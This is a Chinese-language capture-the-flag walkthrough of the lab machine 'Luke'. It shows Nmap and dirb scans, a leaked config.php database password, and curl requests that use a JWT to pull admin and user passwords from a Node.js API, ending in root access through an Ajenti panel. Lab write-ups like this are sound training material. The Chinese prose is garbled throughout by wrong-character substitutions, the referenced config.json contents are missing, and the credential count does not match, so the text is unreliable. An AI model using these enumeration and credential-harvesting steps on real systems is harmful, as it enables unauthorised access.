与平常一样,第一步是对主机进行Nmap辨认正在运行的服务:
`Nmap scan report for 10.10.10.137Host is up (0.042s latency).Not shown: 65464 closed ports, 66 filtered portsPORT STATE SERVICE VERSION21/tcp open ftp vsftpd 3.0.3+ (ext.1)| ftp-anon: Anonymous FTP login allowed (FTP code 230)|_drwxr-xr-x 2 0 0 512 Apr 14 12:35 webapp| ftp-syst: | STAT: | FTP server status:| Connected to 10.10.13.75| Logged in as ftp| TYPE: ASCII| No session upload bandwidth limit| No session download bandwidth limit| Session timeout in seconds is 300| Control connection is plain text| Data connections will be plain text| At session startup, client count was 1| vsFTPd 3.0.3+ (ext.1) - secure, fast, stable|_End of status22/tcp open ssh?80/tcp open http Apache httpd 2.4.38 ((FreeBSD) PHP/7.3.3)| http-methods: |_ Potentially risky methods: TRACE|_http-server-header: Apache/2.4.38 (FreeBSD) PHP/7.3.3|_http-title: Luke3000/tcp open http Node.js Express framework|_http-title: Site doesn't have a title (application/json; charset=utf-8).8000/tcp open http Ajenti http control panel|_http-title: AjentiNo exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).TCP/IP fingerprint:OS:SCAN(V=7.70%E=4%D=8/13%OT=21%CT=1%CU=33830%PV=Y%DS=2%DC=T%G=Y%TM=5D52853OS:5%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=10D%TI=Z%CI=Z%II=RI%TS=21)OOS:PS(O1=M54DNW6ST11%O2=M54DNW6ST11%O3=M54DNW6NNT11%O4=M54DNW6ST11%O5=M54DNOS:W6ST11%O6=M54DST11)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FFFF)EOS:CN(R=Y%DF=Y%T=40%W=FFFF%O=M54DNW6SLL%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%FOS:=AS%RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=40%W=FFFF%S=O%A=S+%F=AS%O=M54DNW6ST11%ROS:D=0%Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%OS:S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(OS:R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0OS:%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=S%T=40%CD=S)Network Distance: 2 hopsTRACEROUTE (using port 587/tcp)HOP RTT ADDRESS1 40.68 ms 10.10.12.12 40.94 ms 10.10.10.137OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 4814.02 seconds` * 1* 2* 3* 4* 5* 6* 7* 8* 9* 10* 11* 12* 13* 14* 15* 16* 17* 18* 19* 20* 21* 22* 23* 24* 25* 26* 27* 28* 29* 30* 31* 32* 33* 34* 35* 36* 37* 38* 39* 40* 41* 42* 43* 44* 45* 46* 47* 48* 49* 50* 51* 52* 53从该输入中咱们能够看到有很多凋谢的端口。我看到的第一个是FTP,因为它容许匿名登录。
`root@kali:~/Documents/luke# ncftp 10.10.10.137NcFTP 3.2.5 (Feb 02, 2011) by Mike Gleason (http://www.NcFTP.com/contact/).Connecting to 10.10.10.137... vsFTPd 3.0.3+ (ext.1) ready...Logging in... Login successful.Logged in to 10.10.10.137. ncftp / > lswebapp/ncftp / > cd webapp/Directory successfully changed.ncftp /webapp > lsfor_Chihiro.txtncftp /webapp > cat for_Chihiro.txt Dear Chihiro !!As you told me that you wanted to learn Web Development and Frontend, I can give you a little push by showing the sources of the actual website I've created .Normally you should know where to look but hurry up because I will delete them soon because of our security policies ! Derry ncftp /webapp >` * 1* 2* 3* 4* 5* 6* 7* 8* 9* 10* 11* 12* 13* 14* 15* 16* 17* 18* 19* 20* 21* 22* 23如您所见,通过FTP托管了一个文件。这是给千寻人的txt文件。这仿佛是FTP上所有可用的货色。接下来,我决定移至端口80。浏览至10.10.10.137以查看托管的内容。
向我介绍了根本的Bootstrap 4页。源代码中没有暗藏任何内容,页面外也没有链接。而后,我运行dirb来查找服务器上托管的其余目录和文件。
`root@kali:~/Documents/luke# dirb http://10.10.10.137-----------------DIRB v2.22 By The Dark Raver-----------------START_TIME: Tue Aug 13 08:45:35 2019URL_BASE: http://10.10.10.137/WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt-----------------GENERATED WORDS: 4612 ---- Scanning URL: http://10.10.10.137/ ----==> DIRECTORY: http://10.10.10.137/css/ + http://10.10.10.137/index.html (CODE:200|SIZE:3138) ==> DIRECTORY: http://10.10.10.137/js/ + http://10.10.10.137/LICENSE (CODE:200|SIZE:1093) + http://10.10.10.137/management (CODE:401|SIZE:381) ==> DIRECTORY: http://10.10.10.137/member/ ==> DIRECTORY: http://10.10.10.137/vendor/ ---- Entering directory: http://10.10.10.137/css/ ----(!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://10.10.10.137/js/ ----(!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://10.10.10.137/member/ ----(!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://10.10.10.137/vendor/ ----(!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) -----------------END_TIME: Tue Aug 13 09:02:59 2019DOWNLOADED: 4612 - FOUND: 3` * 1* 2* 3* 4* 5* 6* 7* 8* 9* 10* 11* 12* 13* 14* 15* 16* 17* 18* 19* 20* 21* 22* 23* 24* 25* 26* 27* 28* 29* 30* 31* 32* 33* 34* 35* 36* 37* 38* 39* 40* 41* 42* 43发现了目录的汇合。我还应用dirbuster从新扫描并找到了/login.php和config.php。因为某种原因而被dirb抢走了。
当我浏览到config.php时,将返回以下内容:
`$dbHost = 'localhost'; $dbUsername = 'root'; $dbPassword = 'Zk6heYCyv6ZE9Xcg'; $db = "login"; $conn = new mysqli($dbHost, $dbUsername, $dbPassword,$db) or die("Connect failed: %sn". $conn -> error);` * 1当初,咱们有了一个用户名和明码的根:Zk6heYCyv6ZE9Xcg。/治理是发现的其余重要外观之一。当您浏览至此时,将显示HTTP根本身份验证字段。目前在端口80上仿佛没有其余任何货色。因而,我随后移至端口3000。
当您尝试连贯到它时,您会收到JSON响应:大概3000仿佛是托管NodeJS利用的主机。
`{"success":false,"message":"Auth token is not supplied"}` * 1我在端口3000上运行dirb尝试查找其余内容。
`DirBuster 1.0-RC1 - Reporthttp://www.owasp.org/index.php/Category:OWASP_DirBuster_ProjectReport produced on Tue Aug 13 11:36:44 BST 2019--------------------------------http://10.10.10.137:3000--------------------------------Directories found during testing:Dirs found with a 200 response:/login//users///Login//users/admin//Users//Users/admin//users/Admin//Users/Admin//LogIn//LOGIN/----------------------------------------------------------------` * 1* 2* 3* 4* 5* 6* 7* 8* 9* 10* 11* 12* 13* 14* 15* 16* 17* 18* 19* 20* 21* 22* 23* 24* 25* 26所有这些目录返回的JSON响应与原始目录十分类似,表明您须要进行身份验证。通过一番考察,我发现该应用程序正在应用JSON Web令牌。通过向身份验证服务器发送蕴含正确的用户名和明码的申请。服务器将应用令牌进行响应,而后能够应用令牌对应用程序进行身份验证。通过大量的试验和谬误后,我能够应用以下串行生成令牌申请:
`root@kali:/# curl -s -X POST -H 'Accept: application/json' -H 'Content-Type: application/json' --data '{"username":"admin","password":"Zk6heYCyv6ZE9Xcg","rememberMe":false}' http://10.10.10.137:3000/login{"success":true,"message":"Authentication successful!","token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY1Nzc5NTg4LCJleHAiOjE1NjU4NjU5ODh9.pwVbukEZa90WsYzVOovh6GUer7wbHG1mNti9E9ajDJM"}root@kali:/#` * 1* 2如您所见,我应用CURL将POST申请发送到http://10.10.10.137:3000/login。POST申请中蕴含在端口80上找到的用户名和明码。服务器以令牌明码响应。而后,我应用curl将令牌转发给应用程序。
`root@kali:/# curl -H 'Accept: application/json' -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY1Nzc5NTg4LCJleHAiOjE1NjU4NjU5ODh9.pwVbukEZa90WsYzVOovh6GUer7wbHG1mNti9E9ajDJM" http://10.10.10.137:3000{"message":"Welcome admin ! "}root@kali:/#` * 1* 2* 3发送后,服务器将显示音讯“欢送管理员!”。而后,我将同一令牌发送到与dirb找到的端口3000上的其余目录。
`root@kali:/# curl -H 'Accept: application/json' -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY1Nzc5NTg4LCJleHAiOjE1NjU4NjU5ODh9.pwVbukEZa90WsYzVOovh6GUer7wbHG1mNti9E9ajDJM" http://10.10.10.137:3000/users[{"ID":"1","name":"Admin","Role":"Superuser"},{"ID":"2","name":"Derry","Role":"Web Admin"},{"ID":"3","name":"Yuri","Role":"Beta Tester"},{"ID":"4","name":"Dory","Role":"Supporter"}]root@kali:/# root@kali:/# curl -H 'Accept: application/json' -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY1Nzc5NTg4LCJleHAiOjE1NjU4NjU5ODh9.pwVbukEZa90WsYzVOovh6GUer7wbHG1mNti9E9ajDJM" http://10.10.10.137:3000/users/admin{"name":"Admin","password":"WX5b7)>/rp$U)FW"}` * 1* 2* 3* 4* 5您能够看到/ users目录响应了一个用户名。管理员,德里,尤里和多莉。/users / admin目录以Admin的用户名和明码作为响应。管理员:WX5b7)> / rp $ U) FW。而后,我将令牌发送给/ users中的3个用户。
`root@kali:~/Documents/luke# curl -H 'Accept: application/json' -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY1Nzc5NTg4LCJleHAiOjE1NjU4NjU5ODh9.pwVbukEZa90WsYzVOovh6GUer7wbHG1mNti9E9ajDJM" http://10.10.10.137:3000/users/derry{"name":"Derry","password":"rZ86wwLvx7jUxtch"}root@kali:~/Documents/luke# curl -H 'Accept: application/json' -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY1Nzc5NTg4LCJleHAiOjE1NjU4NjU5ODh9.pwVbukEZa90WsYzVOovh6GUer7wbHG1mNti9E9ajDJM" http://10.10.10.137:3000/users/yuri{"name":"Yuri","password":"bet@tester87"}root@kali:~/Documents/luke# curl -H 'Accept: application/json' -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY1Nzc5NTg4LCJleHAiOjE1NjU4NjU5ODh9.pwVbukEZa90WsYzVOovh6GUer7wbHG1mNti9E9ajDJM" http://10.10.10.137:3000/users/dory{"name":"Dory","password":"5y:!xa=ybfe)/QD"}` * 1* 2* 3* 4* 5* 6所以毕竟,我有5套凭证
- Dory:5y:!xa = ybfe)/ QD
- Yuri:bet @ tester87
- Derry:rZ86wwLvx7jUxtch
- Admin:WX5b7)> / rp $ U)FW
- root:Zk6heYCyv6ZE9Xcg
我回到端口80上的/治理,顺次尝试了每个时间表。Derry用户可能登录。从这里,咱们有一个目录,列出了3个不同的文件。Config.json,config.php和login.php 。我关上config.json并显示以下内容:
您能够从此JSON输入中看到,咱们当初有了另一个root用户明码。而后,我持续摸索8000端口。
这是用于治理服务器的软件。我尝试应用后面的步骤中捕捉的6组替换登录。来自config.json的root登录名容许我登录到该页面。
而后在计算机上生成Web浏览器终端会话。有了该终端的拜访权限,我便能够将user.txt和root.txt都保存起来以实现计算机。
# cd /root